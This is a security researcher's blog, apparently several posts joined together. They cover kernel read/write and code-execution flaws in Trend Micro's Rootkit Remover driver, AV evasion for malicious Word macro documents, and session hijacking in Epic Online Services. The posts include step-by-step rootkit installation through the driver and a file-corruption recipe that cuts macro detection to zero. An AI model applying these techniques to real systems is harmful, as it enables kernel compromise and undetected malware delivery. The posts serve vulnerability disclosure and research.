Since DeleteTaskResults calls the constructor specified in the virtual function table of the MicroScan instance, to call an arbitrary kernel function we need to:

  1. Be able to allocate at least 10 bytes of kernel memory (for vtable and tag).
  2. Control the allocated kernel memory to set the virtual function table pointer and the tag.
  3. Be able to determine the address of this kernel memory from user-mode.

Fortunately a mentor of mine, Alex Ionescu, was able to point me in the right direction when it comes to allocating and controlling kernel memory from user-mode. A HackInTheBox Magazine from 2010 had an article by Matthew Jurczyk called "Reserve Objects in Windows 7". This article discussed using APC Reserve Objects, which was introduced in Windows 7, to allocate controllable kernel memory from user-mode. The general idea is that you can queue an Apc to an Apc Reserve Object with the ApcRoutine and ApcArgumentX members being the data you want in kernel memory and then use NtQuerySystemInformation to find the Apc Reserve Object in kernel memory. This reserve object will have the previously specified KAPC variables in a row, allowing a user-mode application to control up to 32 bytes of kernel memory (on 64-bit) and know the location of the kernel memory. I would strongly suggest reading the article if you'd like to learn more.

This trick still works in Windows 10, meaning we're able to meet all three requirements. By using an Apc Reserve Object, we can allocate at least 10 bytes for the MicroScan structure and bypass the inadequate checks completely. The result? The ability to call arbitrary kernel pointers:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Although I provided a specific example of vulnerable code in DeleteTaskResults, any of the functions I marked in the table with asterisks are vulnerable. They all trust the kernel pointer specified by the untrusted client and end up calling a function in the MicroScan instance's virtual function table.

IoControlCode == 90004033h

Discovery

This next sub dispatch table primarily manages the TrueApi class we reviewed before.

OperationCode PrimaryRoutine Description
EA60h IoControlGetTrueAPIPointer Retrieve pointers of functions in the TrueApi class.
EA61h IoControlGetUtilityAPIPointer Retrieve pointers of utility functions of the driver.
EA62h IoControlRegisterUnloadNotify* Register a function to be called on unload.
EA63h IoControlUnRegisterUnloadNotify Unload a previously registered unload function.

Exploitation

IoControlRegisterUnloadNotify

This function caught my eye the moment I saw its name in a debug string. Using this sub dispatch table function, an untrusted client can register up to 16 arbitrary "unload routines" that get called when the driver unloads. This function's validator routine checks this pointer from the untrusted client buffer for validity. If the caller is from user-mode, the validator calls ProbeForRead on the untrusted pointer. If the caller is from kernel-mode, the validator checks that it is a valid kernel memory address.

This function cannot immediately be used in an exploit from user-mode. The problem is that if we're a user-mode caller, we must provide a user-mode pointer, because the validator routine uses ProbeForRead. When the driver unloads, this user-mode pointer gets called, but it won't do much because of mitigations such as SMEP. I'll reference this function in a later section, but it is genuinely scary to see an untrusted user-mode client being able to direct a driver to call an arbitrary pointer by design.

IoControlCode == 900040DFh

This sub dispatch table is used to interact with the XrayApi. Although the Xray Api is generally used by scans implemented in the kernel, this sub dispatch table provides limited access for the client to interact with physical drives.

OperationCode PrimaryRoutine Description
15F90h IoControlReadFile Read a file directly from a disk.
15F91h IoControlUpdateCoreList Update the kernel pointers used by the Xray Api.
15F92h IoControlGetDRxMapTable Get a table of drives mapped to their corresponding devices.

IoControlCode == 900040E7h

Discovery

The final sub dispatch is used to scan for hooks in a variety of system structures. It was interesting to see the variety of hooks Trend Micro checks for including hooks in object types, major function tables, and even function inline hooks.

OperationCode PrimaryRoutine Description
186A0h TMXMSCheckSystemRoutine Check a few system routines for hooks.
186A1h TMXMSCheckSystemFileIO Check file IO major functions for hooks.
186A2h TMXMSCheckSpecialSystemHooking Check the file object type and ntoskrnl Io functions for hooks.
186A3h TMXMSCheckGeneralSystemHooking Check the Io manager for hooks.
186A4h TMXMSCheckSystemObjectByName Recursively trace a system object (either a directory or symlink).
186A5h TMXMSCheckSystemObjectByName2* Copy a system object into user-mode memory.

Exploitation

Yeah, TMXMSCheckSystemObjectByName2 is as bad as it sounds. Before looking at the function directly, here's a few reverse engineered structures used later:

struct CheckSystemObjectParams
{
    PVOID Src;
    PVOID Dst;
    DWORD Size;
    DWORD* OutSize;
};

struct TXMSParams
{
    DWORD OutStatus;
    DWORD HandlerID;
    CHAR unk[0x38];
    CheckSystemObjectParams* CheckParams;
};

TMXMSCheckSystemObjectByName2 takes in a Source pointer, Destination pointer, and a Size in bytes. The validator function called for TMXMSCheckSystemObjectByName2 checks the following:

  • ProbeForRead on the CheckParams member of the TXMSParams structure.
  • ProbeForRead and ProbeForWrite on the Dst member of the CheckSystemObjectParams structure.

Essentially, this means that we need to pass a valid CheckParams structure and the Dst pointer we pass is in user-mode memory. Now let's look at the function itself:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Although that for loop may seem scary, all it is doing is an optimized method of checking a range of kernel memory. For every memory page in the range Src to Src + Size, the function calls MmIsAddressValid. The real scary part is the following operations:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

These lines take an untrusted Src pointer and copies Size bytes to the untrusted Dst pointer... yikes. We can use the memmove operations to read an arbitrary kernel pointer, but what about writing to an arbitrary kernel pointer? The problem is that the validator for TMXMSCheckSystemObjectByName2 requires that the destination is user-mode memory. Fortunately, there is another bug in the code.

The next *params->OutSize = Size; line takes the Size member from our structure and places it at the pointer specified by the untrusted OutSize member. No verification is done on what OutSize points to, thus we can write up to a DWORD each IOCTL call. One caveat is that the Src pointer would need to point to valid kernel memory for up to Size bytes. To meet this requirement, I just passed the base of the ntoskrnl module as the source.

Using this arbitrary write primitive, we can use the previously found unload routines trick to execute code. Although the validator routine prevents us from passing in a kernel pointer if we're calling from user-mode, we don't actually need to go through the validator. Instead, we can write to the unload routine array inside of the driver's .data section using our write primitive and place the pointer we want.

Really, really bad code

Typically, I like sticking to strictly security in my blog posts, but this driver made me break that tradition. In this section, we won't be covering the security issues of the driver, rather the terrible code that's used by millions of Trend Micro customers around the world.

Bruteforcing Processes

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Let's take a look at what's happening here. This function has a for loop from 0 to 0x10000, incrementing by 4, and retrieves the object of the process behind the current index (if there is one). If the index does match a process, the function checks if the name of the process is csrss.exe. If the process is named csrss.exe, the final check is that the session ID of the process is 0. Come on guys, there is literally documented API to enumerate processes from kernel... what's the point of bruteforcing?

Bruteforcing Offsets

EPROCESS ImageFileName Offset

How to use Trend Micro's Rootkit Remover to Install a Rootkit

When I first saw this code, I wasn't sure what I was looking at. The function takes the current process, which happens to be the System process since this is called in a System thread, then it searches for the string "System" in the first 0x1000 bytes. What's happening is... Trend Micro is bruteforcing the ImageFileName member of the EPROCESS structure by looking for the known name of the System process inside of its EPROCESS structure. If you wanted the ImageFileName of a process, just use ZwQueryInformationProcess with the ProcessImageFileName class...

EPROCESS Peb Offset

How to use Trend Micro's Rootkit Remover to Install a Rootkit

In this function, Trend Micro uses the PID of the csrss process to brute force the Peb member of the EPROCESS structure. The function retrieves the EPROCESS object of the csrss process by using PsLookupProcessByProcessId and it retrieves the PebBaseAddress by using ZwQueryInformationProcess. Using those pointers, it tries every offset from 0 to 0x2000 that matches the known Peb pointer. What's the point of finding the offset of the Peb member when you can just use ZwQueryInformationProcess, as you already do...

ETHREAD StartAddress Offset

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Here Trend Micro uses the current system thread with a known start address to brute force the StartAddress member of the ETHREAD structure. Another case where finding the raw offset is unnecessary. There is a semi-documented class of ZwQueryInformationThread called ThreadQuerySetWin32StartAddress which gives you the start address of a thread.

Unoptimized Garbage

How to use Trend Micro's Rootkit Remover to Install a Rootkit

When I initially decompiled this function, I thought IDA Pro might be simplifying a memset operation, because all this function was doing was setting all of the TrueApi structure members to zero. I decided to take a peek at the assembly to confirm I wasn't missing something...

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Yikes... looks like someone turned off optimizations.

Cheating Microsoft's WHQL Certification

So far we've covered methods to read and write arbitrary kernel memory, but there is one step missing to install our own rootkit. Although you could execute kernel shellcode with just a read/write primitive, I generally like finding the path of least resistance. Since this is a third-party driver, chances are, there is some NonPagedPool memory allocated which we can use to host and execute our malicious shellcode.

Let's take a look at how Trend Micro allocates memory. Early in the entrypoint of the driver, Trend Micro checks if the machine is a "supported system" by checking the major version, minor version, and the build number of the operating system. Trend Micro does this because they hardcode several offsets which can change between builds.

Fortunately, the PoolType global variable which is used to allocate non-paged memory is set to 0 (NonPagedPool) by default. I noticed that although this value was 0 initially, the variable was still in the .data section, meaning it could be changed. When I looked at what wrote to the variable, I saw that the same function responsible for checking the operating system's version also set this PoolType variable in certain cases.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

From a brief glance, it looked like if our operating system is Windows 10 or a newer version, the driver prefers to use NonPagedPoolNx. Good from a security standpoint, but bad for us. This is used for all non-paged allocations, meaning we would have to find a spare ExAllocatePoolWithTag that had a hardcoded NonPagedPool argument otherwise we couldn't use the driver's allocated memory on Windows 10. But, it's not that straightforward. What about MysteriousCheck(), the second requirement for this if statement?

How to use Trend Micro's Rootkit Remover to Install a Rootkit

What MysteriousCheck() was doing was checking if Microsoft's Driver Verifier was enabled... Instead of just using NonPagedPoolNx on Windows 8 or higher, Trend Micro placed an explicit check to only use secure memory allocations if they're being watched. Why is this not just an example of bad code? Trend Micro's driver is WHQL certified:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Passing Driver Verifier has been a long-time requirement of obtaining WHQL certification. On Windows 10, Driver Verifier enforces that drivers do not allocate executable memory. Instead of complying with this requirement designed to secure Windows users, Trend Micro decided to ignore their user's security and designed their driver to cheat any testing or debugging environment which would catch such violations.

Honestly, I'm dumbfounded. I don't understand why Trend Micro would go out of their way to cheat in these tests. Trend Micro could have just left the Windows 10 check, why would you even bother creating an explicit check for Driver Verifier? The only working theory I have is that for some reason most of their driver is not compatible with NonPagedPoolNx and that only their entrypoint is compatible, otherwise there really isn't a point.

Delivering on my promise

As I promised, you can use Trend Micro's driver to install your own rootkit. Here is what you need to do:

  1. Find any NonPagedPool allocation by the driver. As long as you don't have Driver Verifier running, you can use any of the non-paged allocations that have their pointers stored in the .data section. Preferably, pick an allocation that isn't used often.
  2. Write your kernel shellcode anywhere in the memory allocation using the arbitrary kernel write primitive in TMXMSCheckSystemObjectByName2.
  3. Execute your shellcode by registering an unload routine (directly in .data) or using the several other execution methods present in the 90004027h dispatch table.

It's really as simple as that.

Conclusion

I reverse a lot of drivers and you do typically see some pretty dumb stuff, but I was shocked at many of the findings in this article coming from a company such as Trend Micro. Most of the driver feels like proof-of-concept garbage that is held together by duct tape.

Although Trend Micro has taken basic precautionary measures such as restricting who can talk to their driver, a significant amount of the code inside of the IOCTL handlers includes very risky DKOM. Also, I'm not sure how certain practices such as bruteforcing anything would get through adequate code review processes. For example, the Bruteforcing Processes code doesn't make sense, are Trend Micro developers not aware of enumerating processes via ZwQuerySystemInformation? What about disabling optimizations? Anti-virus already gets flak for slowing down client machines, why would you intentionally make your driver slower? To add insult to injury, this driver is used in several Trend Micro products, not just their rootkit remover. All I know going forward is that I won't be a Trend Micro customer anytime soon.

Defeating Macro Document Static Analysis with Pictures of My Cat

16 September 2020 at 11:33
Defeating Macro Document Static Analysis with Pictures of My Cat

Over the past few weeks I've spent some time learning Visual Basic for Applications (VBA), specifically for creating malicious Word documents to act as an initial stager. When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, how does anti-virus detect a malicious macro?

The hypothesis I came up with was that anti-virus would parse out macro content from the word document and scan the macro code for a variety of malicious techniques, nothing crazy. A common pattern I've seen attackers counter this sort-of detection is through the use of macro obfuscation, which is effectively scrambling macro content in an attempt to evade the malicious patterns anti-virus looks for.

The questions I wanted answered were:

  1. How does anti-virus even retrieve the macro content?
  2. What differences are there for the retrieval of macro content between the implementation in Microsoft Word and anti-virus?

Discovery

According to Wikipedia,Open Office XML (OOX) "is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents". This is the file format used for the common Microsoft Word extensions docx and docm. The fact that Microsoft Office documents were essentially a zip file of XML files certainly piqued my interest.

Since the OOX format is just a zip file, I found that parsing macro content from a Microsoft Word document was simpler than you might expect. All an anti-virus would need to do is:

  1. Extract the Microsoft Office document as a ZIP and look for the file word\vbaProject.bin.
  2. Parse the OLE binary and extract the macro content.

The differences I was interested in was how the methods would handle errors and corruption. For example, common implementations of ZIP extraction will often have error checking such as:

  1. Does the local file header begin with the signature 0x04034b50?
  2. Is the minimum version bytes greater than what is supported?

What I was really after was finding ways to break the ZIP parser in anti-virus without breaking the ZIP parser used by Microsoft Office.

Before we get into corrupting anything, we need a base sample first. As an example, I simply wrote a basic macro "Hello World!" that would appear when the document was opened.

Defeating Macro Document Static Analysis with Pictures of My Cat

For the purposes of testing detection of macros, I needed another sample document that was heavily detected by anti-virus. After a quick google search, I found a few samples shared by @malware_traffic here. The sample named HSOTN2JI.docm had the highest detection rate, coming in at 44/61 engines marking the document as malicious.

Defeating Macro Document Static Analysis with Pictures of My Cat

To ensure that detections were specifically based on the malicious macro inside the document's vbaProject.bin OLE file, I...

  1. Opened both my "Hello World" and the HSOTN2JI macro documents as ZIP files.
  2. Replaced the vbaProject.bin OLE file in my "Hello World" macro document with the vbaProject.bin from the malicious HSOTN2JI macro document.

Running the scan again resulted in the following detection rate:

Defeating Macro Document Static Analysis with Pictures of My Cat

Fortunately, these anti-virus products were detecting the actual macro and not solely relying on conventional methods such as blacklisting the hash of the document. Now with a base malicious sample, we can begin tampering with the document.

Exploitation

The methodology I used for the methods of corruption is:

  1. Modify the original base sample file with the corruption method.
  2. Verify that the document still opens in Microsoft Word.
  3. Upload the new document to VirusTotal.
  4. If good results, retry the method on my original "Hello World" macro document and verify that the macro still works.

Before continuing, it's important to note that the methods discussed in this blog post does come with drawbacks, specifically:

  1. Whenever a victim opens a corrupted document, they will receive a prompt asking whether or not they'd like to recover the document:
Defeating Macro Document Static Analysis with Pictures of My Cat
  1. Before the macro is executed, the victim will be prompted to save the recovered document. Once the victim has saved the recovered document, the macro will execute.

Although adding any user interaction certainly increases the complexity of the attack, if a victim was going to enable macros anyway, they'd probably also be willing to recover the document.

General Corruption

We'll first start with the effects of general corruption on a Microsoft Word document. What I mean by this is I'll be corrupting the file using methods that are non-specific to the ZIP file format.

First, let's observe the impact of adding random bytes to the beginning of the file.

Defeating Macro Document Static Analysis with Pictures of My Cat
Defeating Macro Document Static Analysis with Pictures of My Cat

With a few bytes at the beginning of the document, we were able to decrease detection by about 33%. This made me confident that future attempts could reduce this even further.

Result: 33% decrease in detection

Prepending My Cat

This time, let's do the same thing except prepend a JPG file, in this case, a photo of my cat!

Defeating Macro Document Static Analysis with Pictures of My Cat

You might think that prepending some random data should result in the same detection rate as an image, but some anti-virus marked the file as clean as soon as they saw an image.

Defeating Macro Document Static Analysis with Pictures of My Cat

To aid in future research, the anti-virus engines that marked the random data document as malicious but did not mark the cat document as malicious were:

Ad-Aware
ALYac
DrWeb
eScan
McAfee
Microsoft
Panda
Qihoo-360
Sophos ML
Tencent
VBA32

The reason this list is larger than the actual difference in detection is because some engines strangely detected this cat document, but did not detect the random data document.

Result: 50% decrease in detection

Prepending + Appending My Cat

Purely appending data to the end of a macro document barely impacts the detection rate, instead we'll be combining appending data with other methods starting with my cat.

Defeating Macro Document Static Analysis with Pictures of My Cat

What was shocking about all of this was even when the ZIP file was in the middle of two images, Microsoft's parser was able to reliably recover the document and macro! With only extremely basic modification to the document, we were able to essentially prevent most detection of the macro.

Result: 88% decrease in detection

Zip Corruption

Microsoft's fantastic document recovery is not just exclusive to general methods of file corruption. Let's take a look at how it handles corruption specific to the ZIP file format.

Corrupting the ZIP Local File Header

The only file we care about preventing access to is the vbaProject.bin file, which contains the malicious macro. Without corrupting the data, could we corrupt the file header for the vbaProject.bin file and still have Microsoft Word recognize the macro document?

Let's take a look at the structure of a local file header from Wikipedia:

Defeating Macro Document Static Analysis with Pictures of My Cat

I decided that the local file header signature would be the least likely to break file parsing, hoping that Microsoft Word didn't care whether or not the file header had the correct magic value. If Microsoft Word didn't care about the magic, corrupting it had a high chance of interfering with ZIP parsers that have integrity checks such as verifying the value of the magic.

After corrupting only the file header signature of the vbaProject.bin file entry, we get the following result:

Defeating Macro Document Static Analysis with Pictures of My Cat
Defeating Macro Document Static Analysis with Pictures of My Cat

With a ZIP specific corruption method, we almost completely eliminated detection.

Result: 90% decrease in detection

Combining Methods

With all of these methods, we've been able to reduce static detection of malicious macro documents quite a bit, but it's still not 100%. Could these methods be combined to achieve even lower rates of detection? Fortunately, yes!

Method Detection Rate Decrease
Prepending Random Bytes 33%
Prepending an Image 50%
Prepending and Appending an Image 88%
Corrupting ZIP File Header 90%
Prepending/Appending Image and Corrupting ZIP File Header 100%

Interested in trying out the last corruption method that reduced detection by 100%? I made a script to do just that! To use it, simply execute the script providing document filename as the first argument and a picture filename for the second parameter. The script will spit out the patched document to your current directory.

As stated before, even though these methods can bring down the detection of a macro document to 0%, it comes with high costs to attack complexity. A victim will not only need to click to recover the document, but will also need to save the recovered document before the malicious macro executes. Whether or not that added complexity is worth it for your team will widely depend on the environment you're against.

Regardless, one must heavily applaud the team working on Microsoft Office, especially those who designed the fantastic document recovery functionality. Even when compared to tools that are specifically designed to recover ZIP files, the recovery capability in Microsoft Office exceeds all expectations.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

17 December 2020 at 16:07
Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

As someone who enjoys games that involve logistics, a recently-released game caught my eye. That game was Satisfactory, which is all about building up a massive factory on an alien planet from nothing. Since I loved my time with Factorio, another logistics-oriented game, Satisfactory seemed like a perfect fit!

Satisfactory had a unique feature that I rarely see in games today, peer-to-peer multiplayer sessions! Generally speaking, most games take the client-server approach of having dedicated servers serving multiple clients instead of the peer-to-peer model where clients serve each other.

I was curious to see how it worked under the hood. As a security researcher, one of my number one priorities is to always "stay curious" with anything I interact with. This was a perfect opportunity to exercise that curiosity!

Introduction

When analyzing the communication of any application, a great place to start is to attempt to intercept the HTTP traffic. Often times applications won't use an overly complicated protocol if they don't need to and web requests happen to be one of the most common ways of communicating. For intercepting not only plaintext traffic, I used Fiddler by Telerik which features a simple-to-use interface for intercepting HTTP(S) traffic. Fiddler took care of installing the root certificate it would use to issue certificates for websites automatically, but the question was if Satisfactory used a platform that had certificate pinning. Only one way to find out!

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Lucky for us, the game did not have any certificate pinning mechanism. The first two requests appeared to query the latest game news from Coffee Stain Games, the creators of Satisfactory. I was sad to see that these requests were performed over HTTP, but fortunately did not contain sensitive information.

Taking a look at the other requests revealed that Satisfactory was authenticating with Epic Games. Perhaps they were using an Epic Games service for their multiplayer platform?

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

In the first request to Epic Games' API servers, there are a few interesting headers that indicate what service this could be in connection to. Specifically the User-Agent and Miscellaneous headers referred to something called "EOS". A quick Google search revealed that this stood for Epic Online Services!

Discovery

Epic Online Services is intended to assist game developers in creating multiplayer-compatible games by offering a platform that supports many common multiplayer features. Whether it be matchmaking, lobbies, peer-to-peer functionality, etc; there are many attractive features the service offers to game developers.

Before we continue with any security review, it's important to have a basic conceptual understanding of the product you're reviewing. This context can be especially helpful in later stages when trying to understand the inner workings of the product.

First, let's take a look at how you authenticate with the Epic Online Services API (EOS-API). According to documentation, the EOS Client uses OAuth Client Credentials to authenticate with the EOS-API. Assuming you have already set up a project in the EOS Developer Portal, you can generate credentials for either the GameServer or GameClient role , which are expected to be hardcoded into the server/client binary:

The EOS SDK requires a program to provide valid Client Credentials, including a Client ID and Client Secret. This information is passed in the the EOS_Platform_ClientCredentials structure, which is a parameter in the function EOS_Platform_Create. This enables the SDK to recognize the program as a valid EOS Client, authorize the Client with EOS, and grant access to the features enabled in the corresponding Client Role.

I found it peculiar that the only "client roles" that existed were GameServer and GameClient. The GameClient role "can access EOS information, but typically can't modify it", whereas the GameServer role "is a server or secure backend intended for administrative purposes". If you're writing a peer-to-peer game, what role do you give clients?

GameClient credentials won't work for hosting sessions, given that it's meant for read-only access, but  GameServer credentials are only meant for "a server or secure backend". A peer-to-peer client is neither a server nor anything I'd call "secure", but Epic Games effectively forces developers to embed GameServer credentials, because otherwise how can peer-to-peer clients host sessions?

The real danger here is that the documentation falsely assumes that if a client has GameServer role,  it should be trusted, when in fact the client may be an untrusted P2P client. I was amused by the fact that Epic Games even gives an example of the problem with giving untrusted clients the GameServer role:

The Client is a server or secure backend intended for administrative purposes. This type of Client can directly modify information on the EOS backend. For example, an EOS Client with a role of GameServer could unlock Achievements for a player.

Going back to those requests we intercepted earlier, the client credentials are pretty easy to extract.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

In the authentication request above, the client credentials are simply embedded as a Base64-encoded string in the Authorization header. Decoding this string provides a username:password combination, which represents the client credentials. With such little effort, we are able to obtain credentials for the GameServer role giving significant access to the backend used for Satisfactory. We'll take a look at what we can do with GameServer credentials in a later section.

Since we're interested in peer-to-peer sessions/matchmaking, the next place to look is the "Sessions interface", which "gives players the ability to host, find, and interact with online gaming sessions". This Sessions interface can be obtained through the Platform interface function EOS_Platform_GetSessionsInterface. The core components of session creation that are high value targets include session creation, session discovery, and joining a session. Problems in these processes could have significant security impact.

Discovery: Session Creation

The first process to look at is session creation. Creating a session with the Sessions interface is relatively simple.

First, you create a EOS_Sessions_CreateSessionModificationOptions structure that contains the following information:

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Finally, you need to pass this structure to the EOS_Sessions_CreateSessionModification function to create the session. Although this function will end up creating your session, there is a significant amount you can configure about a session given that the initial structure passed only contains required information to create a barebone session.

Discovery: Finding Sessions

For example, let's talk about how matchmaking works with these sessions. A major component of Sessions is the ability to add "custom attributes":

Sessions can contain user-defined data, called attributes. Each attribute has a name, which acts as a string key, a value, an enumerated variable identifying the value's type, and a visibility setting.

These "attributes" are what allows developers to add custom information about a session, such as the map the session is for or what version the host is running at.

EOS makes session searching simple. Similar to session creation, to create a barebone "session search", you simply call EOS_Sessions_CreateSessionSearch with a EOS_Sessions_CreateSessionSearchOptions structure. This structure has the minimum amount of information needed to perform a search, containing only the maximum number of search results to return.

Before performing a search, you can update the session search object to filter for specific properties. EOS allows you to search for session based on:

  • A known unique session identifier (at least 16 characters in length).
  • A known unique user identifier.
  • Session Attributes.

Although you can use a session identifier or a user identifier if you're joining a known specific session, for matchmaking purposes, attributes are the only way to "discover" sessions based on user-defined data.

Discovery: Sensitive Information Disclosure

Satisfactory isn't a matchmaking game and you'd assume they'd use the unique session identifier provided by the EOS-API. Unfortunately, until a month ago, EOS did not allow you to set a custom session identifier. Instead they forced game developers to use their randomly generated 32 character session ID.

When hosting a session in Satisfactory, hosts are given the option to set a custom session identifier. When joining a multiplayer session, besides joining via a friend, Satisfactory gives the option of using this session identifier to join sessions. How does this work in the background?

Although the EOS-API assigns a random session identifier to every newly created session, many implementations ignore it and choose to use attributes to store a session identifier. Being honest, who wants to share a random 32 character string with friends?

I decided the best way to figure out how Satisfactory handled unique session identifiers was to see what happens on the network when I attempt to join a custom session ID.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Here is the request performed when I attempted to join a session with the identifier "test123":

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [
    {
      "key": "attributes.NUMPUBLICCONNECTIONS_l",
      "op": "GREATER_THAN_OR_EQUAL",
      "value": 1
    },
    {
      "key": "bucket",
      "op": "EQUAL",
      "value": "Satisfactory_1.0.0"
    },
    {
      "key": "attributes.FOSS=SES_CSS_SESSIONID_s",
      "op": "EQUAL",
      "value": "test123"
    }
  ],
  "maxResults": 2
}

Of course, this returned no valid sessions, but this request interestingly revealed that the mechanism used for finding sessions was based on a set of criteria. I was curious, how much flexibility did the EOS-API give the client when it comes to this criteria?

Exploitation: Sensitive Information Disclosure

The first idea I had when I saw that filtering was based on an array of "criteria" was what happens when you specify no criteria? To my surprise, the EOS-API was quite accommodating:

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Although sessions in Satisfactory are advertised to be "Friends-Only", I was able to enumerate all sessions that weren't set to "Private". Along with each session, I am given the IP Address for the host and their user identifier. On a large-scale basis, an attacker could easily use this information to create a map of most players.

To be clear, this isn't just a Satisfactory issue. You can enumerate the sessions of any game you have at least GameClient credentials for. Obviously in a peer-to-peer model, other players have the potential to learn your IP Address, but the problem here is that it is very simple to enumerate the thousands of sessions active given that besides the initial authentication, there are literally no access controls (not even rate-limiting). Furthermore, to connect to another client through the EOS-API, you don't even need to have the IP Address of the host!

Discovery: Session Hijacking

Going back to what we're really interested in, the peer-to-peer functionality of EOS, I was curious to learn what connecting to other clients actually looks like and what problems might exist with its design. Reading the "Sending and Receiving Data Through P2P Connections" section of the NAT P2P Interface documentation reveals that to connect to another player, we need their:

  1. Product user ID - This "identifies player data for an EOS user within the scope of a single product".
  2. Optional socket ID - This is a unique identifier for the specific socket to connect to. In common implementations of EOS, this is typically the randomly generated 32 character "session identifier".

Now that we know what data we need, the next step is understanding how the game itself shares these details between players.

One of the key features of the EOS Matchmaking/Session API we took a look at in a previous section is the existence of "Attributes", described by documentation to be a critical part of session discovery:

The most robust way to find sessions is to search based on a set of search parameters, which act as filters. Some parameters could be exposed to the user, such as enabling the user to select a certain game type or map, while others might be hidden, such as using the player's estimated skill level to find matches with appropriate opponents.

For peer-to-peer sessions, attributes are even more important, because they are the only way of carrying information about a session to other players. For a player to join another's peer-to-peer session, they need to retrieve the host's product user ID and an optional socket ID. Most implementations of Epic Online Services store this product user ID in the session's attributes. Of course, only clients with the  GameServer  role are allowed to create sessions and/or modify its attributes.

Exploitation: Session Hijacking

Recalling the first section, the core vulnerability and fundamental design flaw with EOS is that P2P games are required to embed  GameServer  credentials into their application. This means that theoretically speaking, an attacker can create a fake session with any attribute values they'd like. This got me thinking: if attributes are the primary way clients find sessions to join, then with  GameServer  credentials we can effectively "duplicate" existing sessions and potentially hijack the session clients find when searching for the original session.

Sound confusing? It is! Let's talk through a real-world example.

One widely used implementation of Epic Online Services is the "OnlineSubsystemEOS" (EOS-OSS) included with the Unreal Engine. This plugin is a very popular implementation widely used by games such as Satisfactory.

In Satisfactory's use of EOS-OSS, they use an attribute named SES_CSS_SESSIONID to track sessions. For example, if a player wanted their friend to join directly, they could give their friend a session ID from their client which the friend would be able to use to join. When the session ID search is executed, all that's happening is a filter query against all sessions for that session ID attribute value. Once the session has been found, EOS-OSS joins the session by retrieving the required product user ID of the host through another session attribute named OWNINGPRODUCTID.

Since Satisfactory is a peer-to-peer game exclusively using the Epic Online Services API, an attacker can use the credentials embedded in the binary to get access to the  GameServer  role. With a  GameServer  token, an attacker can hijack existing sessions by creating several "duplicate" sessions that have the same session ID attribute, however,  have the OWNINGPRODUCTID attribute set to their own product user ID.

When a victim executes a search for the session with the right session ID, more likely than not, the query will return one of the duplicated sessions that has the attacker's product user ID (ordering of sessions is random). Thus, when the victim attempts to join the game, they will join the attacker's game instead!

This attack is quite more severe than it may seem, because it is trivial to script this attack to hijack all sessions at once and cause all players joining any session to join the attacker's session instead. To summarize, this fundamental design flaw allows attackers to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".

Remediation

When it comes to communication, Epic Games was one of the best vendors I have ever worked with. Epic Games consistently responded promptly, showed a high level of respect for my time, and was willing to extensively discuss the vulnerability. I can confidently say that the security team there is very competent and that I have no doubt of their skill. When it comes to actually "getting things done" and fixing these vulnerabilities, the response was questionable.

To my knowledge:

  1. Epic Games has partially* remediated the sensitive information disclosure vulnerability, opting to use a custom addressing format for peer-to-peer hosts instead of exposing their real IP Address in the ADDRESS session attribute.
  2. Epic Games has not remediated the session hijacking issue, however, they have released a new "Client Policy" mechanism, including a Peer2Peer policy intended for "untrusted client applications that want to host multiplayer matches". In practice, the only impact to the vulnerability is that there is an extra layer of authentication to perform it, requiring that the attacker be a user of the game (in contrast to only having client credentials). Epic Games has noted that they plan to "release additional tools to developers in future updates to the SDK, allowing them to further secure their products".

* If a new session does not set its own ADDRESS attribute, the EOS-API will automatically set their public IP Address as the ADDRESS attribute.

Instead of fixing the severe design flaw, Epic Games has opted to update their documentation with several warnings about how to use EOS correctly and add trivial obstacles for an attacker (i.e the user authentication required for session hijacking). Regardless of their warnings, the vulnerability is still in full effect. Here are a list of various notices Epic Games has placed in their documentation:

  1. In the documentation for the Session interface, Epic Games has placed several warnings all stating that attackers can leak the IP Address of a peer-to-peer host or server.
  2. Epic Games has created a brand new Matchmaking Security page which is a sub-page of the Session interface outlining:
  • Attackers may be able to access the IP Address and product user ID of a session host.
  • Attackers may be able to access any custom attributes set by game developers for a session.
  • Some "best practices" such as only expose information you need to expose.
  1. Epic Games has transitioned to a new Client Policy model for authentication, including policies for untrusted clients.

Can this really be fixed?

I'd like to give Epic Games every chance to explain themselves with these questionable remediation choices. Here is the statement they made after reviewing this article.

Regarding P2P matchmaking, the issues you’ve outlined are faced by nearly all service providers in the gaming industry - at its core P2P is inherently insecure. The EOS matchmaking implementation follows industry standard practices. It's ultimately up to developers to implement appropriate checks to best suit their product. As previously mentioned, we are always working to improve the security around our P2P policy and all of our other matchmaking policies.

Unfortunately, I have a lot of problems with this statement:

  1. Epic Games erroneously included the IP Address of peers in the session attributes, even though this information was never required in the first place. Exposing PII unnecessarily is certainly not an industry standard. At the end of the day, an attacker can likely figure out the IP of a client if they have their product user ID and socket ID, but Epic Games made it trivial for an attacker to enumerate and map an entire games' matchmaking system by including that unnecessary info.
  2. "The EOS matchmaking implementation follows industry standard practices": The only access control present is a single layer of authentication...
  3. Epic Games has yet to implement common mitigations such as rate-limiting.
  4. There are an insane number of ways to insecurely implement Epic Online Services and Epic Games has documented none of these cases or how to defend against them. A great example is when games like Satisfactory store sensitive information like a session ID in the session's attributes.
